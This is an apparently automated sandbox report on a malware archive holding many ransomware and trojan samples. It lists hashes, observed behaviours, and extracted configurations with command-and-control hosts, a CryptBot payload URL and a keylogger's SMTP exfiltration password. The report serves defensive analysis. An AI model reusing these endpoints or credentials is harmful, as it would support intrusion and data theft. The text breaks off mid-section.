Analysis
-
max time kernel
242s -
max time network
245s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-10-2024 19:43
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00462.7z
Resource
win10v2004-20241007-en
General
-
Target
RNSM00462.7z
-
Size
43.1MB
-
MD5
16c1b775fd61d301fa85b64ef9c7c972
-
SHA1
64e4463c7e974480061fb8c8787e7b4ca789f861
-
SHA256
194c7d681f8c905c6f89414ebf06a71f851e38b391bad73902aa4b4e73806a4c
-
SHA512
a391321473117cf178d1a4b4fa79b5bce5f96764660f67270e713da1693a127004897b8eaaa83bde83d87546b9b5b4aeb6c3e486b761ab9f1894561acfd1830c
-
SSDEEP
786432:PqcCaXezoivPTCchXuW2lzMjzc3fWZRaGtXrdycC51FE+7+x1jGcx7+7i72v7j+q:PqPqeztTCiXuPlzMEPsRft5bC51FEp1O
Malware Config
Extracted
njrat
im523
badya
2.tcp.ngrok.io:12438
5e4a8dc8cd9d3a2e42914844f5688d1f
-
reg_key
5e4a8dc8cd9d3a2e42914844f5688d1f
-
splitter
|'|'|
Extracted
asyncrat
0.5.7B
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
127.0.0.1:287
mytestdns123.mooo.com:6606
mytestdns123.mooo.com:7707
mytestdns123.mooo.com:8808
mytestdns123.mooo.com:287
testdns.ydns.eu:6606
testdns.ydns.eu:7707
testdns.ydns.eu:8808
testdns.ydns.eu:287
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_file
AsyncRAT.exe
-
install_folder
%AppData%
Extracted
njrat
im523
HacKed
mgoogloe.ddns.net:3055
608b43860bd3442535512bd18040ddc1
-
reg_key
608b43860bd3442535512bd18040ddc1
-
splitter
|'|'|
Extracted
cryptbot
knuzjh62.top
morwye06.top
-
payload_url
http://sarjeb09.top/download.php?file=lv.exe
Extracted
nanocore
1.2.2.0
darkrig.ddns.net:54984
127.0.0.1:54984
2f20429c-c6e2-4e93-b919-bfd4058948f7
-
activate_away_mode
true
-
backup_connection_host
127.0.0.1
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2018-09-14T22:24:42.173380636Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
true
-
connect_delay
4000
-
connection_port
54984
-
default_group
Default
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
2f20429c-c6e2-4e93-b919-bfd4058948f7
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
darkrig.ddns.net
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Extracted
urelas
1.234.83.146
133.242.129.155
218.54.31.226
218.54.30.235
218.54.31.165
112.175.88.207
112.175.88.208
Extracted
redline
ytzip
135.148.139.222:33569
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.primexlanka.lk - Port:
587 - Username:
[email protected] - Password:
PlOg@$57 - Email To:
[email protected]
Signatures
-
CryptBot payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/3212-649-0x0000000000400000-0x0000000002406000-memory.dmp family_cryptbot behavioral1/memory/3212-947-0x0000000000400000-0x0000000002406000-memory.dmp family_cryptbot -
Modifies WinLogon for persistence 2 TTPs 2 IoCs
Processes:
HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exeHEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe HelpMe.exe" HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Roaming\\JgyFDFhGJgjYGjkjhK\\ORz3qcl5PTvg.exe\",explorer.exe" HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/5632-1613-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
SectopRAT payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/5632-1613-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/5708-2177-0x0000000000400000-0x0000000000424000-memory.dmp family_snakekeylogger -
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell and hide display window.
Processes:
Powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 5212 Powershell.exe 5420 powershell.exe 2352 powershell.exe 4924 powershell.exe 5976 powershell.exe 5712 powershell.exe 3196 powershell.exe 5568 powershell.exe 5828 powershell.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 1988 netsh.exe 4432 netsh.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks computer location settings 2 TTPs 21 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
HEUR-Trojan.MSIL.Crypt.gen-81bd002cd9063ead258f20093a3ba8a0950dc2e6f2e9ab6417dd2e049cb1e7a2.exetmp1E0F.tmp.exemagek.exeservices32.exesvchost32.exeHEUR-Trojan.MSIL.Cryptos.gen-bc7295a0f160c635706426e02f2b91a65f91543438e6fc6c555a0bf6a85a3077.exeHEUR-Trojan.MSIL.Crypt.gen-6cf6715578124129e279c73bcb6d9aaf380aaa71776b07deb242c65e069bb349.execmd.exeTrojan-Ransom.Win32.Cryptodef.aoo-960306dc1fc227939790b4242f4e812aef164bda3e7bd3b3a1f22788e65300a7.exeTrojan-Ransom.Win32.GenericCryptor.czo-73385e09346d834147a4b68db0b839c783123b030761a724b8bea5a904039354.exeTrojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exeHEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exeHEUR-Trojan.MSIL.Crypt.gen-c88a94b57c6f59d709e3175c01d7e505df46a825e22f08f860257d48a58f38dd.exeWindowsDefender.exeTrojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exesvchost32.exeCOM7.EXEHEUR-Trojan-Ransom.Win32.Blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exeHEUR-Trojan.MSIL.Crypt.gen-eb01cedd82b31373d4c5eb721248a97239efcc247c17823bb5493ed73423bcaf.exeTrojan-Ransom.Win32.GenericCryptor.cys-364e6e208c6074b907cabf8bb826155775e3a9c74044fa0c8d994dfff61d2364.exeWScript.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation HEUR-Trojan.MSIL.Crypt.gen-81bd002cd9063ead258f20093a3ba8a0950dc2e6f2e9ab6417dd2e049cb1e7a2.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation tmp1E0F.tmp.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation magek.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation services32.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation svchost32.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation HEUR-Trojan.MSIL.Cryptos.gen-bc7295a0f160c635706426e02f2b91a65f91543438e6fc6c555a0bf6a85a3077.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation HEUR-Trojan.MSIL.Crypt.gen-6cf6715578124129e279c73bcb6d9aaf380aaa71776b07deb242c65e069bb349.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Cryptodef.aoo-960306dc1fc227939790b4242f4e812aef164bda3e7bd3b3a1f22788e65300a7.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.GenericCryptor.czo-73385e09346d834147a4b68db0b839c783123b030761a724b8bea5a904039354.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation HEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation HEUR-Trojan.MSIL.Crypt.gen-c88a94b57c6f59d709e3175c01d7e505df46a825e22f08f860257d48a58f38dd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WindowsDefender.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Trojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation svchost32.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation COM7.EXE Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation HEUR-Trojan.MSIL.Crypt.gen-eb01cedd82b31373d4c5eb721248a97239efcc247c17823bb5493ed73423bcaf.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.GenericCryptor.cys-364e6e208c6074b907cabf8bb826155775e3a9c74044fa0c8d994dfff61d2364.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe -
Deletes itself 1 IoCs
Processes:
Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exepid Process 6040 Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe -
Drops startup file 9 IoCs
Processes:
DLL32.exeHEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exechromet.exetaskmgr.exeTrojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exeCOM7.EXEdescription ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java update.exe DLL32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5e4a8dc8cd9d3a2e42914844f5688d1f.exe chromet.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\filename.vbs taskmgr.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java update.exe DLL32.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5e4a8dc8cd9d3a2e42914844f5688d1f.exe chromet.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\filename.vbs Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PDF Reader Launcher.exe COM7.EXE -
Executes dropped EXE 64 IoCs
Processes:
HEUR-Trojan-Ransom.Win32.Blocker.gen-7d1a6a371aed5661b7f62da5e040396dda8a17733174e25f6b211ffef5810245.exeHEUR-Trojan-Ransom.Win32.Blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exeHEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exeHEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exeHEUR-Trojan-Ransom.Win32.Gen.gen-ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14.exezbhnd.exeHEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exeHEUR-Trojan-Ransom.Win32.Stop.gen-70526e6e5bd07f7a0eb2dab278c107340fcd9f59505af54507528fd8032bc5df.exemain.exeHEUR-Trojan.MSIL.Crypt.gen-08c273af2b38f8c03028bc1e8f383d784712ff84b7b9c9e421ce1c9213d2e557.exeHEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exeHEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exeHEUR-Trojan.MSIL.Crypt.gen-49b033d90c561256dbe38618a71c2b61d3872c0e0029ab30fc3f5a509105770f.exeHEUR-Trojan.MSIL.Crypt.gen-6cf6715578124129e279c73bcb6d9aaf380aaa71776b07deb242c65e069bb349.exeHEUR-Trojan.MSIL.Crypt.gen-779da79cc7425f8b7264e175a58ad72e0a1ab0534840a438fc228c7baee809d1.exeHEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exeHEUR-Trojan.MSIL.Crypt.gen-81bd002cd9063ead258f20093a3ba8a0950dc2e6f2e9ab6417dd2e049cb1e7a2.exeHEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exeHEUR-Trojan.MSIL.Crypt.gen-c11b258979d24a7c988d540cb3551c58a3addbbdb85c2307aee72eae8c5c3770.exeHEUR-Trojan.MSIL.Crypt.gen-c88a94b57c6f59d709e3175c01d7e505df46a825e22f08f860257d48a58f38dd.exeHEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exeHEUR-Trojan.MSIL.Crypt.gen-d87374e98b04a552b43671748cd846f1ecff5b1c31172f8e80a2acdc9bb13567.exeHEUR-Trojan.MSIL.Crypt.gen-df0a37eacb80e772be78ec2a3e71546d18d68ba918b8ca859e8707da81b9bb02.exeHEUR-Trojan.MSIL.Crypt.gen-eb01cedd82b31373d4c5eb721248a97239efcc247c17823bb5493ed73423bcaf.exeHEUR-Trojan.MSIL.Cryptos.gen-bc7295a0f160c635706426e02f2b91a65f91543438e6fc6c555a0bf6a85a3077.exeTrojan-Ransom.Win32.Agent.bajf-f65fafe8abf65e7503162428814c31afbd1400ed64a3c324d3afe47047efd752.exeMServices.exeWindowsDefender.exeUpdateChecker.exeTemp4qsldidhv1r.exeextd.exechromet.exeDLL32.exeextd.exeHEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exeTrojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exeTrojan-Ransom.Win32.Blocker.mgn-b02abdc5dfa6b16dcff708bdedb876333bbbf8c3b3966dbb317edadff584126d.exeextd.exeTrojan-Ransom.Win32.Crypren.aidd-f2fed74902730102b3666009d639d2cd8211d13445c13658896fd92000a9612e.exeTrojan-Ransom.Win32.Cryptodef.aoo-960306dc1fc227939790b4242f4e812aef164bda3e7bd3b3a1f22788e65300a7.exeTrojan-Ransom.Win32.GenericCryptor.cys-364e6e208c6074b907cabf8bb826155775e3a9c74044fa0c8d994dfff61d2364.exewujek.exeTrojan-Ransom.Win32.GenericCryptor.czo-73385e09346d834147a4b68db0b839c783123b030761a724b8bea5a904039354.exeTrojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exeTrojan.MSIL.Crypt.hhej-89630c8b19c2db52f6504b2db7f0730ecd426dc008dad0f21ee3592c601ee410.exeTrojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exeTrojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exeWin.Ransomware.Azvo-9979243-0-0155894f2ad1ef4217f3281c96169df6148ac32c7bf2aa35a320d8806a715e79.exemagek.exeashcv.exeWin.Ransomware.Azvo-9979243-0-107cfb10b85f27081475968b9c655f70d678283df2029cd3d510d2ac4ab1abb4.exemagek.exeTrojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exeCOM7.EXEWin.Ransomware.Azvo-9979243-0-15e7a36d54970419f5e9629a3c3607a87c7e0424ceaadf37e493c4c5a2c1ab7b.exeGoogle.exeWin.Ransomware.Azvo-9979243-0-19d655c11e2dd8e33ee0b22a199121605b5eeba1e4bd3faadd3fe2498a9273a1.exeWin.Ransomware.Azvo-9979243-0-313f5fd480c090a7c82f7eddf8c0d1e8b9fd0bf7ccf91c1d68e713bfc99bcef8.exesvchost32.exeWin.Ransomware.Azvo-9979243-0-489187c02dc221272fe21e1b98fa0829fd0fb5e34e485581d861583ec812db26.exeWin.Ransomware.Azvo-9979243-0-51c251c1c631f2cf9747859ed7504c8b457aa208ac76ad172cee63f062f8e857.exeWin.Ransomware.Azvo-9979243-0-5217efafa021c6db6953f47edf76847d13e16e025201ec1b121eb9a44f794df9.exeWin.Ransomware.Azvo-9979243-0-704fe6e056b3eb3d456cc42358931e46a6200f271c2ac000983fd4c5c3c5b448.exeWin.Ransomware.Azvo-9979243-0-81344710637c19e5d348418999f93546e11f45ee16831b1b5cc6e2d3812c4968.exepid Process 5012 HEUR-Trojan-Ransom.Win32.Blocker.gen-7d1a6a371aed5661b7f62da5e040396dda8a17733174e25f6b211ffef5810245.exe 3696 HEUR-Trojan-Ransom.Win32.Blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exe 2276 HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe 2260 HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe 3144 HEUR-Trojan-Ransom.Win32.Gen.gen-ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14.exe 4852 zbhnd.exe 452 HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe 3212 HEUR-Trojan-Ransom.Win32.Stop.gen-70526e6e5bd07f7a0eb2dab278c107340fcd9f59505af54507528fd8032bc5df.exe 3532 main.exe 2876 HEUR-Trojan.MSIL.Crypt.gen-08c273af2b38f8c03028bc1e8f383d784712ff84b7b9c9e421ce1c9213d2e557.exe 1072 HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe 760 HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe 2884 HEUR-Trojan.MSIL.Crypt.gen-49b033d90c561256dbe38618a71c2b61d3872c0e0029ab30fc3f5a509105770f.exe 4204 HEUR-Trojan.MSIL.Crypt.gen-6cf6715578124129e279c73bcb6d9aaf380aaa71776b07deb242c65e069bb349.exe 4944 HEUR-Trojan.MSIL.Crypt.gen-779da79cc7425f8b7264e175a58ad72e0a1ab0534840a438fc228c7baee809d1.exe 3408 HEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exe 3956 HEUR-Trojan.MSIL.Crypt.gen-81bd002cd9063ead258f20093a3ba8a0950dc2e6f2e9ab6417dd2e049cb1e7a2.exe 532 HEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exe 552 HEUR-Trojan.MSIL.Crypt.gen-c11b258979d24a7c988d540cb3551c58a3addbbdb85c2307aee72eae8c5c3770.exe 4560 HEUR-Trojan.MSIL.Crypt.gen-c88a94b57c6f59d709e3175c01d7e505df46a825e22f08f860257d48a58f38dd.exe 2020 HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe 3664 HEUR-Trojan.MSIL.Crypt.gen-d87374e98b04a552b43671748cd846f1ecff5b1c31172f8e80a2acdc9bb13567.exe 4940 HEUR-Trojan.MSIL.Crypt.gen-df0a37eacb80e772be78ec2a3e71546d18d68ba918b8ca859e8707da81b9bb02.exe 4564 HEUR-Trojan.MSIL.Crypt.gen-eb01cedd82b31373d4c5eb721248a97239efcc247c17823bb5493ed73423bcaf.exe 3200 HEUR-Trojan.MSIL.Cryptos.gen-bc7295a0f160c635706426e02f2b91a65f91543438e6fc6c555a0bf6a85a3077.exe 2864 Trojan-Ransom.Win32.Agent.bajf-f65fafe8abf65e7503162428814c31afbd1400ed64a3c324d3afe47047efd752.exe 432 MServices.exe 2704 WindowsDefender.exe 4968 UpdateChecker.exe 4776 Temp4qsldidhv1r.exe 1636 extd.exe 4008 chromet.exe 636 DLL32.exe 4500 extd.exe 5196 HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe 5336 Trojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exe 5412 Trojan-Ransom.Win32.Blocker.mgn-b02abdc5dfa6b16dcff708bdedb876333bbbf8c3b3966dbb317edadff584126d.exe 5464 extd.exe 5492 Trojan-Ransom.Win32.Crypren.aidd-f2fed74902730102b3666009d639d2cd8211d13445c13658896fd92000a9612e.exe 5588 Trojan-Ransom.Win32.Cryptodef.aoo-960306dc1fc227939790b4242f4e812aef164bda3e7bd3b3a1f22788e65300a7.exe 5756 Trojan-Ransom.Win32.GenericCryptor.cys-364e6e208c6074b907cabf8bb826155775e3a9c74044fa0c8d994dfff61d2364.exe 5856 wujek.exe 5864 Trojan-Ransom.Win32.GenericCryptor.czo-73385e09346d834147a4b68db0b839c783123b030761a724b8bea5a904039354.exe 5996 Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe 6012 Trojan.MSIL.Crypt.hhej-89630c8b19c2db52f6504b2db7f0730ecd426dc008dad0f21ee3592c601ee410.exe 6024 Trojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exe 6040 Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe 3616 Win.Ransomware.Azvo-9979243-0-0155894f2ad1ef4217f3281c96169df6148ac32c7bf2aa35a320d8806a715e79.exe 4020 magek.exe 5124 ashcv.exe 2572 Win.Ransomware.Azvo-9979243-0-107cfb10b85f27081475968b9c655f70d678283df2029cd3d510d2ac4ab1abb4.exe 4640 magek.exe 5064 Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe 4912 COM7.EXE 5892 Win.Ransomware.Azvo-9979243-0-15e7a36d54970419f5e9629a3c3607a87c7e0424ceaadf37e493c4c5a2c1ab7b.exe 5960 Google.exe 5820 Win.Ransomware.Azvo-9979243-0-19d655c11e2dd8e33ee0b22a199121605b5eeba1e4bd3faadd3fe2498a9273a1.exe 552 Win.Ransomware.Azvo-9979243-0-313f5fd480c090a7c82f7eddf8c0d1e8b9fd0bf7ccf91c1d68e713bfc99bcef8.exe 3676 svchost32.exe 3616 Win.Ransomware.Azvo-9979243-0-489187c02dc221272fe21e1b98fa0829fd0fb5e34e485581d861583ec812db26.exe 5172 Win.Ransomware.Azvo-9979243-0-51c251c1c631f2cf9747859ed7504c8b457aa208ac76ad172cee63f062f8e857.exe 5404 Win.Ransomware.Azvo-9979243-0-5217efafa021c6db6953f47edf76847d13e16e025201ec1b121eb9a44f794df9.exe 1048 Win.Ransomware.Azvo-9979243-0-704fe6e056b3eb3d456cc42358931e46a6200f271c2ac000983fd4c5c3c5b448.exe 3168 Win.Ransomware.Azvo-9979243-0-81344710637c19e5d348418999f93546e11f45ee16831b1b5cc6e2d3812c4968.exe -
Loads dropped DLL 12 IoCs
Processes:
main.exepid Process 3532 main.exe 3532 main.exe 3532 main.exe 3532 main.exe 3532 main.exe 3532 main.exe 3532 main.exe 3532 main.exe 3532 main.exe 3532 main.exe 3532 main.exe 3532 main.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule behavioral1/memory/6012-852-0x0000000005340000-0x00000000053AE000-memory.dmp agile_net -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
RegAsm.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
Processes:
